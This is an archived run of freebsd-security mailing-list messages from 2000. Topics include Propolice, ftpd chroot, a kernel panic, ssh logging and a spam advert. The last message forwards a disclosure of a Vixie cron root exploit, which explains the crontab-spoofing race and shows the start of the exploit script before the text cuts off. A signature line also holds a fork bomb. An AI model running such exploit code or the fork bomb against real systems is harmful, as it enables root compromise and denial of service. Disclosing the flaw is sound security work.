-----END PGP SIGNATURE----- --liOOAslEiF7prFVr-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 17: 8:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id ADD4A37B479; Thu, 16 Nov 2000 17:08:37 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eAH18aQ02980; Thu, 16 Nov 2000 18:08:36 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA70664; Thu, 16 Nov 2000 18:08:35 -0700 (MST) Message-Id: <200011170108.SAA70664@harmony.village.org> To: Kris Kennaway Subject: Re: FYI: Propolice for gcc-2.95.2 Cc: Mike Silbersack , KOJIMA Hajime , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 16 Nov 2000 17:00:42 PST." <20001116170042.A58481@citusc17.usc.edu> References: <20001116170042.A58481@citusc17.usc.edu> <200011162332.QAA69958@harmony.village.org> Date: Thu, 16 Nov 2000 18:08:35 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001116170042.A58481@citusc17.usc.edu> Kris Kennaway writes: : > I'd worry about putting this into the base system. First, I'd worry : > about the performance impact of all this extra code in the base : > system. Second, I'd worry about bitrot when we move to new versions : > of the source. : : Performance shouldn't be an issue unless you enable the extra bounds : checking at compile time. Right. I guess I'd worry about this being enabled by default as a way of "solving" all stack smashing problems. If it is just a knob to enable for those that want to enable it, I'd be cool with that. : Bitrot is certainly an issue, though. We should at least allow world : to be built using a propolice-enabled compiler - though that should be : fairly automatic just using CC and CFLAGS. My concern would be if we put this into the 2.95.2 tree that we have. I'd have no problems with making this "easy" to enable. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 17:54:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id 80A4837B479 for ; Thu, 16 Nov 2000 17:54:52 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id eAH1sln12127; Thu, 16 Nov 2000 20:54:47 -0500 (EST) Date: Thu, 16 Nov 2000 20:54:47 -0500 (EST) From: Trevor Johnson To: KOJIMA Hajime Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > FYI: "Propolice", GCC extension for protecting applications from > stack-smashing attacks, for gcc-2.95.2 is now available. > > At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches that add bounds-checking to GCC, but unfortunately the newest is for GCC 2.7.2. -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 18: 0: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 80A6837B479 for ; Thu, 16 Nov 2000 17:59:57 -0800 (PST) Received: (qmail 63373 invoked by uid 1000); 17 Nov 2000 01:59:56 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 17 Nov 2000 01:59:56 -0000 Date: Thu, 16 Nov 2000 19:59:56 -0600 (CST) From: Mike Silbersack To: Warner Losh Cc: Kris Kennaway , KOJIMA Hajime , security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <200011170108.SAA70664@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 16 Nov 2000, Warner Losh wrote: > In message <20001116170042.A58481@citusc17.usc.edu> Kris Kennaway writes: > : > I'd worry about putting this into the base system. First, I'd worry > : > about the performance impact of all this extra code in the base > : > system. Second, I'd worry about bitrot when we move to new versions > : > of the source. > : > : Performance shouldn't be an issue unless you enable the extra bounds > : checking at compile time. > > Right. I guess I'd worry about this being enabled by default as a way > of "solving" all stack smashing problems. If it is just a knob to > enable for those that want to enable it, I'd be cool with that. On the contrary, if the support is imported, it should be enabled by default. The simple fact is that those most likely to install badly written software are also probably unaware of how to change the options and rebuild world / ports. Additionally, a default on configuration would allow the distinction of being able to say that FreeBSD is not vulnerable when a certain normally vulnerable port is installed, where other OSes are vulnerable. Of course, that's assuming two things: 1. Propolice actually stops some attacks. While it looks great in theory, it doesn't sound like any commonly exploited apps have been tested for resiliance with propolice compilation. 2. Propolice doesn't break anything. With the number of ports, this sounds like it could be extremely hard to figure out. However, if they've successfully recompiled redhat with it, it can't break that many programs. Obviously the kernel wouldn't be compiled with Propolice ever. A compilation of world with it would be nice in theory, but would certainly raise claims of slowdown. Perhaps apps could be selectively added|removed from the list of protected apps in the base system based on their suid status and auditness? Ports are really where the security's going to be an issue, as will the speed... I'd think propolice should be on there by default. Experienced users concerned with apache running as fast as possible can use flags to cause its protections not to be used when compiling. I guess the argument is analagous to disabling telnet by default. (Note that after saying that, I haven't tried the patches whatsoever, I don't want to break gcc. Could some compiler expert tell us if it works cleanly on FreeBSD?) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 18:24: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 6FF1037B479; Thu, 16 Nov 2000 18:24:02 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eAH2O1Q03206; Thu, 16 Nov 2000 19:24:01 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id TAA71161; Thu, 16 Nov 2000 19:24:00 -0700 (MST) Message-Id: <200011170224.TAA71161@harmony.village.org> To: Mike Silbersack Subject: Re: FYI: Propolice for gcc-2.95.2 Cc: Kris Kennaway , KOJIMA Hajime , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 16 Nov 2000 19:59:56 CST." References: Date: Thu, 16 Nov 2000 19:24:00 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Silbersack writes: : 1. Propolice actually stops some attacks. While it looks great in : theory, it doesn't sound like any commonly exploited apps have been tested : for resiliance with propolice compilation. I wouldn't want to give our users a false sense of security thinking that all stack smashing attacks could be stopped by these patches. There are an interesting number of theoretical attacks that I've read about that it doesn't stop. : 2. Propolice doesn't break anything. With the number of ports, this : sounds like it could be extremely hard to figure out. However, if they've : successfully recompiled redhat with it, it can't break that many programs. That we know of. : Obviously the kernel wouldn't be compiled with Propolice ever. A : compilation of world with it would be nice in theory, but would certainly : raise claims of slowdown. Perhaps apps could be selectively added|removed : from the list of protected apps in the base system based on their suid : status and auditness? Enabling it for setuid programs would be reasonable, assuming that it didn't break them or introduce an unacceptible overhead. However, there have been attacks against shell scripts running at elevated privs where buffer overflows in unpriviledged programs were used to get a foot in the door. These are in the class of cgi attacks, typically, and "shell" is used here very generically. : Ports are really where the security's going to be an issue, as will the : speed... I'd think propolice should be on there by default. Experienced : users concerned with apache running as fast as possible can use flags to : cause its protections not to be used when compiling. We'd need to install two libc's if we did this. We'd need to install a shared libc with this enabled and one without it enabled if we would try to split the baby. But this might be as simple as installing them in separate directories. Of course this would negatively impact worldstone bragging rights for those that have a sub-half-hour buildworld time now :-) I'm sure that there are other issues involved. Talk of enabling it by default is premature until someone makes the effort to port it to FreeBSD's tree, get it integreated and do realworld performance measurement. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 18:57:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp.163.com (unknown [202.108.44.212]) by hub.freebsd.org (Postfix) with ESMTP id DDA4137B4C5 for ; Thu, 16 Nov 2000 18:57:18 -0800 (PST) Received: from localhost (unknown [61.142.250.35]) by smtp.163.com (Postfix) with ESMTP id CD1601C989D39 for ; Fri, 17 Nov 2000 11:03:07 +0800 (CST) X-Sender: bea2@netease.com From: Pan To: FreeBSD-security@FreeBSD.org Date: Fri, 17 Nov 2000 11:01:53 +0800 Subject: aluminium extrusion Reply-To: nhjinxiecheng@sina.com.cn MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit Message-Id: <20001117030307.CD1601C989D39@smtp.163.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Sir or Madam, JinXieCheng Aluminum Manufacturing Co. Ltd., GuangDong is an enterprise specializing in producing electrophoresis paintings aluminium extrusion for architecture and industrial profiles. It products include: curtain wall material, casement window, sliding window, door material, piping material, window, door matrial, piping material, decorative cabinet material and industrial profiles. It has successfully pass the recognition of ISO9002 quality system certification. We have invested a huge sum of capital to import a full set of specialized production equipment from Korea and has been in a technical partnership with Korean DOIL INDUSTRIAL TECHNOLOGIES CO., LTD. whose electrophoresis paintings technology was peer to well known as Japanese HONNYLITE. Since then, a chain of drawbacks had been rectified, the color of aluminum profiles is no longer monotonous. Paintings don't easily come off or fade.ˇˇˇˇˇˇ at present,we are planning to export our products to international market,if you are interested our products,please feel free to contact us. Looking forward to your reply. Thanks and best regards, Jin Xiecheng JinXieCheng Aluminum Manufacturing Co., Ltd. E-mail: nhjinxiecheng@sina.com.cn http://www.jinxiecheng.com Contact Person: Ms Pan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 19:12:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 161F037B479 for ; Thu, 16 Nov 2000 19:12:36 -0800 (PST) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id WAA18894; Thu, 16 Nov 2000 22:15:05 -0500 (EST) (envelope-from rjh@mohawk.net) Date: Thu, 16 Nov 2000 22:15:05 -0500 (EST) From: Ralph Huntington To: Sheldon Jones Cc: freebsd-security@FreeBSD.ORG Subject: Re: chroot and ftpd In-Reply-To: <20001116175348.A76193@hobbydump.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org proftpd may be able to do this as well. It's _highly_ configurable. http://www.proftpd.net/ On Thu, 16 Nov 2000, Sheldon Jones wrote: > Does anyone know of a way to have the chroot function in ftpd lock a user into > a sub-directory under their user directory. I would like a way to keep the > users in a sub-directory under their root dir. > > Ncftpd has this feature but I really like the ftpd that comes with freebsd. > In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles) this will > restrict the user to the sub-derectory userfiles under their account. > > Thank you for your time, > Sheldon Jones > iHighway.net > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 19:30:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from galileo.stargate.org (c552033-a.spokn1.wa.home.com [24.20.116.105]) by hub.freebsd.org (Postfix) with ESMTP id 4E86E37B479 for ; Thu, 16 Nov 2000 19:30:52 -0800 (PST) Received: from BLACKBOX (blackbox.ted.net [192.168.0.9]) by galileo.stargate.org (8.11.0/8.11.0) with SMTP id eAH4P0t30866; Thu, 16 Nov 2000 20:25:01 -0800 Message-ID: <001601c05044$6ceaf6b0$0900a8c0@BLACKBOX> From: "T.D. Brace" To: "Ralph Huntington" , "Sheldon Jones" Cc: References: Subject: Re: chroot and ftpd Date: Thu, 16 Nov 2000 19:13:57 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Yes it will, and has the ability to do it based on group as well. Be sure to cvsup, not use the 1.2.0rc2 that's linked in their site. Nice feature in there is limiting download speed. ----- Original Message ----- From: "Ralph Huntington" To: "Sheldon Jones" Cc: Sent: Thursday, November 16, 2000 7:15 PM Subject: Re: chroot and ftpd > proftpd may be able to do this as well. It's _highly_ configurable. > > http://www.proftpd.net/ > > > On Thu, 16 Nov 2000, Sheldon Jones wrote: > > > Does anyone know of a way to have the chroot function in ftpd lock a user into > > a sub-directory under their user directory. I would like a way to keep the > > users in a sub-directory under their root dir. > > > > Ncftpd has this feature but I really like the ftpd that comes with freebsd. > > In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles) this will > > restrict the user to the sub-derectory userfiles under their account. > > > > Thank you for your time, > > Sheldon Jones > > iHighway.net > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 21:19:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.stikom-sby.ac.id (ns1.stikom-sby.ac.id [202.155.19.2]) by hub.freebsd.org (Postfix) with SMTP id 4376D37B479 for ; Thu, 16 Nov 2000 21:19:13 -0800 (PST) Received: from omicron.stikom.edu (omicron.stikom.edu [202.155.19.12]) by ns1.stikom-sby.ac.id (NTMail 3.02.13) with ESMTP id oa221014 for ; Fri, 17 Nov 2000 12:26:14 +0700 Message-ID: <002201c05055$e3091780$080419ac@teknologi> From: "Tekman" To: References: Subject: Kernel Panic Date: Fri, 17 Nov 2000 12:18:53 +0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I was compile my kernel, and i reboot my FreeBSD. And i find kernel panic: CPU Not Configure. My Computer is Intel Pentium 75 MHz, Ram 16 MByte. I tru to make my komputer ipfirewall for studing. What's wrong with my kernel ? Thank's in advanced regard's tekman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 21:21: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from mr2.ipartners.pl (mr2.ipartners.pl [157.25.5.19]) by hub.freebsd.org (Postfix) with ESMTP id 5AB9B37B479 for ; Thu, 16 Nov 2000 21:21:03 -0800 (PST) Received: from weblab.pl ([195.94.193.62]) by mr2.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id GAA97718; Fri, 17 Nov 2000 06:20:59 +0100 (CET) (envelope-from gorg@weblab.pl) Message-ID: <3A14C238.19C7C60C@weblab.pl> Date: Fri, 17 Nov 2000 06:29:28 +0100 From: Marcin Krasowski X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.14-5.0 i686) X-Accept-Language: pl, en MIME-Version: 1.0 To: Sheldon Jones Cc: freebsd-security@FreeBSD.ORG Subject: Re: chroot and ftpd References: <20001116175348.A76193@hobbydump.com> Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sheldon Jones wrote: > > Does anyone know of a way to have the chroot function in ftpd lock a user into > a sub-directory under their user directory. I would like a way to keep the > users in a sub-directory under their root dir. > > Ncftpd has this feature but I really like the ftpd that comes with freebsd. > In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles) this will > restrict the user to the sub-derectory userfiles under their account. > > Thank you for your time, > Sheldon Jones > iHighway.net > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Just put the name of the user into the /etc/ftpchroot file (create it if You dont have one). There is a problem with reading usernames while doing ls which comes from the absence of /etc/passwd and /etc/group in chrooted enviroment (I hope You've already guessed how to fix it :) but the rest id fully functional. Gorg PS. Hello to the group. it's my first posting here To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 21:25:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from mr2.ipartners.pl (mr2.ipartners.pl [157.25.5.19]) by hub.freebsd.org (Postfix) with ESMTP id C871737B479 for ; Thu, 16 Nov 2000 21:25:49 -0800 (PST) Received: from weblab.pl ([195.94.193.62]) by mr2.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id GAA97762; Fri, 17 Nov 2000 06:25:28 +0100 (CET) (envelope-from gorg@weblab.pl) Message-ID: <3A14C345.7112BC81@weblab.pl> Date: Fri, 17 Nov 2000 06:33:57 +0100 From: Marcin Krasowski X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.14-5.0 i686) X-Accept-Language: pl, en MIME-Version: 1.0 To: Tekman Cc: security@FreeBSD.ORG Subject: Re: Kernel Panic References: <002201c05055$e3091780$080419ac@teknologi> Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tekman wrote: > > I was compile my kernel, and i reboot my FreeBSD. And i find kernel panic: > CPU Not Configure. > > My Computer is Intel Pentium 75 MHz, Ram 16 MByte. I tru to make my komputer > ipfirewall for studing. > > What's wrong with my kernel ? > > Thank's in advanced > > regard's > > tekman > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Are You sure You have the following line enabled in kernel config file ? cpu I586_CPU Gorg PS. Is it really a security question ? Thi list seems to be more 'questionable' every day ? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 21:28:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id F2A1037B479 for ; Thu, 16 Nov 2000 21:28:53 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAH5OrX62507; Thu, 16 Nov 2000 21:24:53 -0800 (PST) (envelope-from kris) Date: Thu, 16 Nov 2000 21:24:53 -0800 From: Kris Kennaway To: Tekman Cc: security@FreeBSD.ORG Subject: Re: Kernel Panic Message-ID: <20001116212453.A62485@citusc17.usc.edu> References: <002201c05055$e3091780$080419ac@teknologi> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="FCuugMFkClbJLl1L" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <002201c05055$e3091780$080419ac@teknologi>; from tekman@stikom.edu on Fri, Nov 17, 2000 at 12:18:53PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --FCuugMFkClbJLl1L Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Nov 17, 2000 at 12:18:53PM +0700, Tekman wrote: >=20 > I was compile my kernel, and i reboot my FreeBSD. And i find kernel panic: > CPU Not Configure. >=20 > My Computer is Intel Pentium 75 MHz, Ram 16 MByte. I tru to make my kompu= ter > ipfirewall for studing. >=20 >=20 > What's wrong with my kernel ? You misconfigured it. This isn't a security issue. Kris --FCuugMFkClbJLl1L Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoUwSUACgkQWry0BWjoQKXauQCfYxuTkSHTzNcEk6JVmuKvYKum zr4An3rdrx9S0DjvJmuIKqZM3tcXkF/2 =aU8S -----END PGP SIGNATURE----- --FCuugMFkClbJLl1L-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 22:37:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 818B537B479; Thu, 16 Nov 2000 22:37:09 -0800 (PST) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 16 Nov 2000 22:35:25 -0800 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id eAH6aAq17791; Thu, 16 Nov 2000 22:36:11 -0800 (PST) (envelope-from cjc) Date: Thu, 16 Nov 2000 22:36:00 -0800 From: "Crist J . Clark" To: Rossen Raykov Cc: kris@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) Message-ID: <20001116223600.B9740@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu> <00d301c04f4d$e9802760$4c00000a@sage> <20001115135331.A22524@citusc17.usc.edu> <010701c04f51$8d2659e0$4c00000a@sage> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <010701c04f51$8d2659e0$4c00000a@sage>; from rraykov@sageian.com on Wed, Nov 15, 2000 at 05:15:24PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 15, 2000 at 05:15:24PM -0500, Rossen Raykov wrote: > Initially the /etc/shells file contains an empty line (between the comments > and the first shell). > I tough that this is the reason why login is granted on a person without > shell in /etc/passwd. > But I ware wrong! > I removed this line from /etc/shells and even after that I was able to gain > root command prompt after a valid password. > The shell is /bin/sh > > Don't this violate the idea of /etc/shells? No. A blank entry in /etc/passwd (/etc/master.passwd actually) is assumed to mean /bin/sh. From passwd(5), The shell field is the command interpreter the user prefers. If there is nothing in the shell field, the Bourne shell (/bin/sh) is assumed. This is more of a -questions thread. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 22:52:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 443B137B4C5 for ; Thu, 16 Nov 2000 22:52:34 -0800 (PST) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 16 Nov 2000 22:50:59 -0800 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id eAH6pKx17890; Thu, 16 Nov 2000 22:51:20 -0800 (PST) (envelope-from cjc) Date: Thu, 16 Nov 2000 22:51:10 -0800 From: "Crist J . Clark" To: Trevor Johnson Cc: Will Mitayai Keeso Rowe , security@FreeBSD.ORG Subject: Re: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall) Message-ID: <20001116225110.C9740@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from trevor@jpj.net on Thu, Nov 16, 2000 at 04:57:37AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Nov 16, 2000 at 04:57:37AM -0500, Trevor Johnson wrote: > > does ssh check /etc/shells ? > > Users can run arbitrary commands with ssh, without a shell ever being > invoked or (at least on my 4.1.1-RELEASE system) anything being > logged. Try this: > > ssh localhost ls > last | head Yes and no. A shell is invoked. There will be no login entry in utmp(5) which is what last(1) reads. $ ssh localhost "sleep 30" While that is running, $ ps jxa | grep -e sleep -e ssh root 243 1 243 b33640 0 Is ?? 0:45.10 /usr/sbin/sshd root 17824 243 243 b33640 0 I ?? 0:00.07 sshd: cjc@notty (sshd) cjc 17825 17824 17825 d63f80 0 Is ?? 0:00.02 tcsh -c sleep 30 cjc 17826 17825 17825 d63f80 0 I ?? 0:00.00 sleep 30 And you just need to enable the logging (nothing in the default syslog.conf will catch it). You can also change the logging in sshd_config. I have, auth.info /var/log/authlog In syslog.conf. When I did the above, Nov 16 22:47:03 149 sshd[17824]: Accepted password for cjc from 127.0.0.1 port 946 Showed up in /var/log/authlog. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 0:35: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id EA01337B479 for ; Fri, 17 Nov 2000 00:34:56 -0800 (PST) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id JAA02617; Fri, 17 Nov 2000 09:34:49 +0100 (MET) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 13wgyu-0004VM-00 for ; Fri, 17 Nov 2000 09:34:48 +0100 Date: Fri, 17 Nov 2000 09:34:48 +0100 From: Szilveszter Adam To: freebsd-security@freebsd.org Subject: [lcamtuf@TPI.PL: vixie cron...] Message-ID: <20001117093448.B17216@petra.hos.u-szeged.hu> Mail-Followup-To: Szilveszter Adam , freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello everybody! For some change, this time a security-related post. Although it seems we are not vulnerable by default, Vixie Cron probably needs fixing. Comments? Regards: Szilveszter ADAM ----- Forwarded message from Michal Zalewski ----- Date: Fri, 17 Nov 2000 05:41:32 +0100 Sender: Bugtraq List From: Michal Zalewski Subject: vixie cron... To: BUGTRAQ@SECURITYFOCUS.COM Attached shell-script exploits fopen() + preserved umask vulnerability in Paul Vixie's cron code. It will work on systems where /var/spool/cron is user-readable (eg. 0755) - AFAIR Debian does so. RedHat (at least 6.1 and previous) have mode 0700 on /var/spool/cron, and thus it isn't exploitable in its default configuration... (ahmm, but this does NOT mean it is a problem of o+rx bits, but of insecure umask() and fopen() calls). I have no information about other distributions or systems - this exploit should automagically detect if you are vulnerable or not (checking /var/spool/cron, looking for Paul Vixie's crontab, etc). Please report your findings to me and/or to BUGTRAQ. If any of your users launched this exploit on screen, and then any other user (including superuser) invoked "crontab -e" to change his/her crontab entries, privledges elevation will occour. The main attack is performed while root (or any other user, but this particular exploit is configured against root - feel free to change it) is editing his crontab entry. After any modification, when crontabs are updated, this exploit will try to insert evil code over the original contents of the crontab file (probability of successful exploitation is near to 100%). This, after approximately one minute, leads to account compromise. At the beginning, this exploit is trying to abuse crontab utility in order to create somewhat enormous number of world-writable temporary files (these files are open with fopen(), and then rename()d to destination name - ugh!). It might take some time and cause less or more heavy load on ancient boxes. After finishing it, exploit is waiting, consuming little or no system resources, till "crontab -e" session will appear. For more details, see exploit code. Vendors were not notified because I have no idea which systems and distros are shipping vulnerable configuration, and because pretty good workaround is simple: chmod 700 /var/spool/cron. _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= #!/bin/sh echo '.-------------------------------------------------------------------------.' echo '| Marchew Hyperreal Industries ................... |' echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |" echo "\`--------------------------------- presents ------------------------------'" echo echo ' * another vixie-cron root sploit by Michal Zalewski * ' echo echo '.-------------------------------------------------------------------------.' echo '| This time, it is somewhat more complicated. On some systems, it might |' echo '| require some tuning, to be slower, but resources-effective. It expects |' echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file" |' echo '| sooner or later, and spoofs the legitimate cron entry file with evil |' echo '| content, thus leading to account compromise (usually: root compromise). |' echo "\`-------------------------------------------------------------------------'" echo CYCLES=32768 DESTUSER=root SHOULDTOOK=60 VCRON="`strings /usr/bin/crontab 2>/dev/null|grep -i vixie`" if [ "$VCRON" = "" ]; then echo "[-] Sorry, this box is not running vixie cron." echo exit 1 else echo "[+] Found Paul Vixie's 